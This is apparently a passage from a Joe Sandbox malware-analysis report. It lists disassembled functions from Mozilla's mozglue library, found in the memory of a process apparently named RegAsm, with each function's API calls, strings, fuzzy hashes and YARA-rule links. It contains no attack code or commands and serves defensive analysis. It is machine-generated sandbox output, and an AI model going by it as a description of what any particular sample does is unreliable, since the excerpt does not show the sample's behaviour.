Part of subcall function 6C0E31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0E32AB
Part of subcall function 6C0E31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0E32D1
Part of subcall function 6C0E31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0E32E5
Part of subcall function 6C0E31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C0E32F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C0F9675
__Init_thread_footer.LIBCMT ref: 6C0F9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C0F96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C0F9707
__Init_thread_footer.LIBCMT ref: 6C0F971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C0F9773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C0F97B7
FreeLibrary.KERNEL32 ref: 6C0F97D0
FreeLibrary.KERNEL32 ref: 6C0F97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C0F9824

Strings

NtMapViewOfSection, xrefs: 6C0F9701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C0F9670
MapViewOfFileNuma2, xrefs: 6C0F97B1
ntdll.dll, xrefs: 6C0F96E3

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: dd210641aedc5526fa843ee30c30797305764b6d29c1e679ef1a3edb6790e2e9
Instruction ID: ba6fdd10b3721e6f7800b709212f3386a1fa1a38b59f8f8779bac68bd8c13b76
Opcode Fuzzy Hash: dd210641aedc5526fa843ee30c30797305764b6d29c1e679ef1a3edb6790e2e9
Instruction Fuzzy Hash: 8461E5717043059BDF00CF6AD888BAABBF5EB4A319F044529ED2583B80D7309995DBA1

Function 6C0E3AB0 Relevance: 24.2, APIs: 13, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C16E768,?,00003000,00000004), ref: 6C0E3AC5
LeaveCriticalSection.KERNEL32(6C16E768,?,00003000,00000004), ref: 6C0E3AE5
VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6C0E3AFB
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C0E3B57
EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0E3B81
LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0E3BA3
EnterCriticalSection.KERNEL32(6C16E7B8), ref: 6C0E3BAE
LeaveCriticalSection.KERNEL32(6C16E7B8), ref: 6C0E3C74
EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0E3C8B
LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0E3C9F
LeaveCriticalSection.KERNEL32(6C16E7B8), ref: 6C0E3D5C
EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0E3D67
LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0E3D8A

Part of subcall function 6C120D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C0E3DEF), ref: 6C120D71
Part of subcall function 6C120D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C0E3DEF), ref: 6C120D84

Strings

MOZ_CRASH(), xrefs: 6C0E3DB2
: (malloc) Error in VirtualFree(), xrefs: 6C0E3DCC
<jemalloc>, xrefs: 6C0E3DC7

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
API String ID: 2380290044-2272602182
Opcode ID: b664150e5c48d50902065471c20a154c0ebac616d4767e3da7a752b1dec14e2c
Instruction ID: be1eea0faec31f1ab697a383625d1e617f575175119855522ca18f7d007959ca
Opcode Fuzzy Hash: b664150e5c48d50902065471c20a154c0ebac616d4767e3da7a752b1dec14e2c
Instruction Fuzzy Hash: C491BC317852058FCB04CF6AC98476ABBF2BF8E314F254628E9129BB91D771E901DBD1

Function 6C0F7FD0 Relevance: 24.2, APIs: 16, Instructions: 166COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C0F8007
moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C0F801D

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C0F802B
K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C0F803D
moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C0F808D

Part of subcall function 6C0FCA10: mozalloc_abort.MOZGLUE(?), ref: 6C0FCAA2

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C0F809B
GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C0F80B9
moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C0F80DF
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0F80ED
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0F80FB
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0F810D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C0F8133
free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C0F8149
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C0F8167
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C0F817C
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0F8199

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
String ID:
API String ID: 2721933968-0
Opcode ID: 43e693aba5aa5109797c5a7a77b5eca7d8ffbb1d0d4c431749b5b9796097733f
Instruction ID: d4424189c6af662f2aef32f016d66b4ddb3e1547be4cf5358a057d4d7e8f1143
Opcode Fuzzy Hash: 43e693aba5aa5109797c5a7a77b5eca7d8ffbb1d0d4c431749b5b9796097733f
Instruction Fuzzy Hash: 325193B2E002145BDB00DFA6DC84BEFB7F9AF49664F580225EC25E7741E730A945CBA1

Function 6C0F11B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6C0F1213
toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C0F1285
memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6C0F12B9
memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6C0F1327

Strings

TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6C0F12AD
&, xrefs: 6C0F126B
MZx, xrefs: 6C0F11E1
Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6C0F120D
CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6C0F131B

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memcpy$toupper
String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
API String ID: 403083179-3658087426
Opcode ID: 600dd652048b5829faf488876d1e51be270b043562b7ca751139ad65689bfab8
Instruction ID: 4cd930c98e1952b1e668f4c1bb5476090351489b9cb4f13b0ab14122e0ad8110
Opcode Fuzzy Hash: 600dd652048b5829faf488876d1e51be270b043562b7ca751139ad65689bfab8
Instruction Fuzzy Hash: 1371A1B1E053588ADB109F64C8047EEB7F5BF89309F04065AD855A3B40DB74BADACB92

Function 6C0E31C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C0E3217
GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C0E3236
FreeLibrary.KERNEL32 ref: 6C0E324B
__Init_thread_footer.LIBCMT ref: 6C0E3260
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C0E327F
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0E328E
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0E32AB
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0E32D1
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0E32E5
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C0E32F7

Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1

__aulldiv.LIBCMT ref: 6C0E346B

Strings

KernelBase.dll, xrefs: 6C0E3212
QueryInterruptTime, xrefs: 6C0E3230

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
String ID: KernelBase.dll$QueryInterruptTime
API String ID: 3006643210-2417823192
Opcode ID: 493b3190c49d61f4f35ba994c1dff5f5172bdc1fba2435fb7973cfe8e088da7e
Instruction ID: 3da3735f5487457ffdc061cbb731a2d7026d57653c4053b70373cb45ed9d5645
Opcode Fuzzy Hash: 493b3190c49d61f4f35ba994c1dff5f5172bdc1fba2435fb7973cfe8e088da7e
Instruction Fuzzy Hash: 7F61EFB1A087418FC711CF39C45176AB7F5BF8A354F218B1DF8A5A36A0EB31A549CB42

Function 6C146660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C16F618), ref: 6C146694
GetThreadId.KERNEL32(?), ref: 6C1466B1
GetCurrentThreadId.KERNEL32 ref: 6C1466B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C1466E1
EnterCriticalSection.KERNEL32(6C16F618), ref: 6C146734
GetCurrentProcess.KERNEL32 ref: 6C14673A
LeaveCriticalSection.KERNEL32(6C16F618), ref: 6C14676C
GetCurrentThread.KERNEL32 ref: 6C1467FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C146868
RtlCaptureContext.NTDLL ref: 6C14687F

Strings

WalkStack64, xrefs: 6C146890

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: 187fda6eef1f46595bb019de377af4938f2e457bf62bf37534e7c60662159f04
Instruction ID: 1149258b0810932d408363a10a25bc05a746df157b122b727bc0b102a5a1eaf8
Opcode Fuzzy Hash: 187fda6eef1f46595bb019de377af4938f2e457bf62bf37534e7c60662159f04
Instruction Fuzzy Hash: 1651DB71A09305AFDB11CF25C884B6ABBF4FF99718F00892DF99887640D774E919CB92

Function 6C12DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F

GetCurrentThreadId.KERNEL32 ref: 6C12DE73
GetCurrentThreadId.KERNEL32 ref: 6C12DF7D
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12DF8A
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12DFC9
GetCurrentThreadId.KERNEL32 ref: 6C12DFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12E000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C0F4A68), ref: 6C12DE7B

Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508

Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C0F4A68), ref: 6C12DEB8
free.MOZGLUE(00000000,?,6C0F4A68), ref: 6C12DEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C12DF38

Strings

[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C12E00E
[I %d/%d] locked_profiler_stop, xrefs: 6C12DE83
<none>, xrefs: 6C12DFD7

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: d88124d5fe23dddc7add8255d8b0375885ce4bf136864d25b8a09a7c2b005183
Instruction ID: 5e485a683c9b3aae742fd0453a609507d00a3926166a9c96c95595e0c35e9f18
Opcode Fuzzy Hash: d88124d5fe23dddc7add8255d8b0375885ce4bf136864d25b8a09a7c2b005183
Instruction Fuzzy Hash: 4E41473AB052109BDB20AF6AD8187BA7775FF4530CF140065EA1597F41CB38A846DBE6

Function 6C13D840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C13D85F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D86C
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D918
GetCurrentThreadId.KERNEL32 ref: 6C13D93C
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D948
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D970
GetCurrentThreadId.KERNEL32 ref: 6C13D976
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D982
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D9CF
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C13DA2E
GetCurrentThreadId.KERNEL32 ref: 6C13DA6F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13DA78
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C13DA91

Part of subcall function 6C105C50: GetTickCount64.KERNEL32 ref: 6C105D40
Part of subcall function 6C105C50: EnterCriticalSection.KERNEL32(6C16F688), ref: 6C105D67

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13DAB7

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
String ID:
API String ID: 1195625958-0
Opcode ID: b6df9c7ecc7e94bb032376842a70f569214c6fcaa29291014db7381e8010f255
Instruction ID: 70096a53ad8e69cbd47d699a35277c71398c5e1eb5cabb6e0af2e3b567826b0e
Opcode Fuzzy Hash: b6df9c7ecc7e94bb032376842a70f569214c6fcaa29291014db7381e8010f255
Instruction Fuzzy Hash: 2771BC716043149FCB00DF29C888BAABBF5FF89358F158569F85A9B301DB30A944DBA1

Function 6C13D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C13D4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D52A
GetCurrentThreadId.KERNEL32 ref: 6C13D530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D55F
free.MOZGLUE(00000000), ref: 6C13D585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C13D5D3
GetCurrentThreadId.KERNEL32 ref: 6C13D5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D652
GetCurrentThreadId.KERNEL32 ref: 6C13D658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D6A2

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 8b99b90bdee76de84a620a721ccaae6d507601f2da89aa9c743c5f4cb282b6c0
Instruction ID: 89d543475b67d090201dcb3ea1bf35488bddf3a7be0c4a9dcfcca59bc3ee1a3d
Opcode Fuzzy Hash: 8b99b90bdee76de84a620a721ccaae6d507601f2da89aa9c743c5f4cb282b6c0
Instruction Fuzzy Hash: B8515AB1604705DFC704DF35C888AAABBB4FF89358F00962EE85A87711DB34E949DB91

Function 6C105670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C1056D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C1056E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C1056F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C105744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C1057BC
GetTickCount64.KERNEL32 ref: 6C1058CB
EnterCriticalSection.KERNEL32(6C16F688), ref: 6C1058F3
__aulldiv.LIBCMT ref: 6C105945
LeaveCriticalSection.KERNEL32(6C16F688), ref: 6C1059B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C16F638,?,?,?,?), ref: 6C1059E9

Strings

MOZ_APP_RESTART, xrefs: 6C1056CC

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: e749a18a689ac63068e319c6175d75d9fc62dc95c948c81e40825e10407543f9
Instruction ID: 8b3302c69cc1708b2846e8d5e9a2ff3d7c3adfe835a0c6f379300cfc062c5c3c
Opcode Fuzzy Hash: e749a18a689ac63068e319c6175d75d9fc62dc95c948c81e40825e10407543f9
Instruction Fuzzy Hash: ACC18A71A087409FDB05CF29C44066ABBF1FFDA714F058A1DE8D497760EB30A886DB82

Function 6C12EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F

GetCurrentThreadId.KERNEL32 ref: 6C12EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12EC8C

Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508

GetCurrentThreadId.KERNEL32 ref: 6C12ECA1
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C12ECC5
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C12ED19
CloseHandle.KERNEL32(?), ref: 6C12ED28
free.MOZGLUE(00000000), ref: 6C12ED2F
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C12EC94

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

